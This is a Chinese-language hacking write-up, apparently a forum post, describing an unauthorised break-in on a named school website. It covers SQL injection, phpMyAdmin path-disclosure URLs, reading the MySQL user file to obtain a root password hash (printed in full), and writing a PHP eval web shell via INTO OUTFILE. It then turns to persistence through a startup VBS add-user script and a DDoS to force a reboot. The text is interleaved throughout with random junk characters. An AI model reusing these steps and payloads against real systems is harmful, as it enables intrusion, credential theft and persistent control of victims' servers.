第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
- A9 C2 m7 c9 x$ I5 u发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!, M! M8 ^. Z% a
+ I& e: A6 C9 R3 s( u$ O8 |; `5 I/ ~+ h" B [8 ^3 H2 R
3 |" U/ P) f( ^- b常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 1 [0 Y! } ^- O" Q, ]+ G. t
# z9 E" k% c7 Y- p, h那么想可以直接写入shell ,getshell有几个条件:+ B; Z# Z" L5 k7 t% S
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF : Z! j, C4 s) r2 n% k" G
2 @+ `1 m# E4 X! ~/ F1 a' L% ]) [
试着爆绝对路径:
1 S H5 O; ?' |1./phpMyAdmin/index.php?lang[]=1 7 d: p! v( S( u8 s! _ q7 {' p
2./phpMyAdmin/phpinfo.php / M/ B3 I$ }+ `( y% g' y0 i
3./load_file()
& Q! v6 c, n* T1 f4./phpmyadmin/themes/darkblue_orange/layout.inc.php
0 I l7 B/ @8 l3 y' [( M4 N$ h4 x: b5./phpmyadmin/libraries/select_lang.lib.php
# K/ b- @6 m5 `/ E4 g7 Z: d* f% C6./phpmyadmin/libraries/lect_lang.lib.php
8 k4 N' F: o3 m4 R# ]! u7./phpmyadmin/libraries/mcrypt.lib.php
2 p; d+ q" X& W- X% ^8./phpmyadmin/libraries/export/xls.php
" d9 f; k! i- J! c4 ^% E% r# p- H+ u/ a1 j+ l* @ s
均不行........................... " N: R3 O; O8 N' V2 A
! U* R& N$ ~5 k. j+ A7 J8 @
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
. m+ Q2 y- x: ^9 J6 [: F @5 g8 q3 R# g3 J: J/ X+ Y: K
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 q; G* R* s7 v! c9 `
9 E6 I+ x, x2 N
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 2 i/ M$ {; O! T; @- t( W, S( W
6 r% \4 X/ y4 p. ~1 c/ B( w( a$ @敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
9 _ v9 [1 g% h* f8 \4 ~3 e2 `6 C/ x
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell , Q( _! y) z4 X/ \1 t" ^+ S
+ O* r- f# J, B. B8 M, fhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 1 _2 \ m6 p, q# o; P. q
/ I( k! o* i' k T3 X* b1 ?( u
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
0 J" u7 ]8 w0 Z$ m2 f$ s5 p( z0 Z" T2 b4 y& a8 d
成功读到root密码: * k( b6 q- y# l
" p9 L, C' ]! O17---- r(0072) # I0 [& x) |! S
18---- o(006f) 3 \& O* [3 G0 q: A; N$ t8 Z+ N+ x0 L
19---- o(006f) / h+ W, Z1 b( g3 {, C/ }. l0 U
20---- t(0074) # B9 x1 I. T1 r; a
21---- *(002a) 6 d7 S' ^% H2 \& Z- V' l, K- J& E) e
22---- 8(0038)
( C2 m8 t) I* }3 s3 r23---- 2(0032) 8 r! x* c8 N5 C$ K/ ^/ G/ S- T
24---- E(0045) " r+ S& `, ` L m3 M
25---- 1(0031) - \9 s% W/ e, g6 _" p
26---- C(0043) 0 p8 s' M7 N8 f& q( m5 I! }
27---- 5(0035)
# i- r2 ?* o' g9 R2 G' P28---- 8(0038)
+ O' F+ U9 Z& Z29---- 2(0032)
/ y) Q" }; ]4 E5 O* D30---- 8(0038)
5 M% o6 j8 t& j6 _. l- F31---- A(0041) 5 V1 z" ^* K* Z
32---- 9(0039)
+ K! r; x. ~2 u* U5 F33---- B(0042) 4 W j( w9 G0 V1 a! y) _. U
34---- 5(0035)
5 Q& Y+ }! g) ^( {, D" u35---- 4(0034) : K( {1 O: l$ W5 t* m% ?
36---- 8(0038) % m" V9 u' \# r
37---- 6(0036)
0 Y$ ?" ~5 O1 X9 j" Y) `38---- 4(0034)
7 b( ^; Y6 Q7 y+ q" O39---- 9(0039)
2 B1 ?7 \$ e" T+ }; b& g40---- 1(0031) 1 i, V1 P1 K: h5 i7 ` u3 t7 S6 Y
41---- 1(0031)
& O% a% M& T( d8 ^( `: R0 ~42---- 5(0035)
! M: H1 |2 K) c8 s# ^, k0 h43---- 3(0033)
' {, @+ X8 R1 |( V& y44---- 5(0035)
# ?3 i3 y! B' P45---- 9(0039) 5 ~* n# {9 C+ a5 Z
46---- 8(0038) # K9 J& C& u3 S
47---- F(0046) 3 e5 Z( R) b; y) J' G
48---- F(0046) 1 ^% U5 t; X z) w B) F: O
49---- 4(0034) 9 i& x/ c9 n! \% M' O$ b% b
50---- F(0046) " b1 ?$ B6 x) N
51---- 0(0030)
( c# c, B+ {: D v f' w# r52---- 3(0033) 4 L- T* s% v& p2 c* [" R
53---- 2(0032) ( G6 X2 l+ O) y
54---- A(0041)
. V! z( G5 H; [0 A55---- 4(0034) % h3 F) L1 |- t. ?* T; ]9 J! l3 r
56---- A(0041) + Y! V; T6 ~) g4 @( @4 ?
57---- B(0042) 4 e- k% p2 C6 l. O$ e! E2 R
58---- *(0044)
) D9 f( ^+ k% c5 s59---- *(0035) : w) V2 \# [7 p; T" e# q
60---- *(0041) 6 r' [6 l6 t3 ^7 e* h7 l8 D
61---- *0032) 1 R( [! s. j" g9 ?& Z( b/ T
' M- E: b0 O, n$ x9 M" H解密后成功登陆phpmyamin . p' K0 R4 f' _5 i" E" G
& D/ y0 m' z# @4 ?2 [
8 m: d/ {+ R3 }* {' d3 y, ^
$ A# H' `4 d8 o) l
+ o1 u: ~5 F' @找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
m) ? ~" G( [
; s( C3 O) n9 z成功执行,拿下shell,菜刀连接:
' U0 N: Z- V. t* U- E
# x9 n! J: c' o服务器不支持asp,aspx,php提权无果...................
- k" a& p6 k* G/ o+ d5 W S8 q7 n) z. g( U( z) [/ m; p2 a
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: & M. f ^% o2 S# H% f) y
服务器上已经有个隐藏帐号了 5 {/ Q1 W! Q$ l* C. H2 I1 [
别名 administrators* }6 \5 S* Z9 |8 h; w9 {7 g
注释 管理员对计算机/域有不受限制的完全访问权 ( R5 g9 `6 e% T& F) r
成员
& a7 u( @. ?2 v2 v( r-------------------------------------------------------------------------------
' M# a& K( x1 H! A4 G* kadmin
$ }! B) D+ K! {. JAdministrator
7 i9 K Y* Z: I0 y7 V1 ?slipper$
+ C' @2 V+ F, b. v% N6 I, Hsqluser
( R" N, W$ V; T; q# |命令成功完成。
+ v2 L6 C' G! H* w. V0 m% f1 m
5 X$ \1 A) d( Y# d. m# U服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。; ^1 r, C1 E4 t, T# D
8 U# \7 ^; D' i/ B3 z
ddos服务器重启,不然就只能坐等服务器重启了...............................
8 B/ ]/ `5 k m6 Z5 `; F
0 w3 R8 ]) _6 J/ W6 ^ ; O p# C6 Z' b
|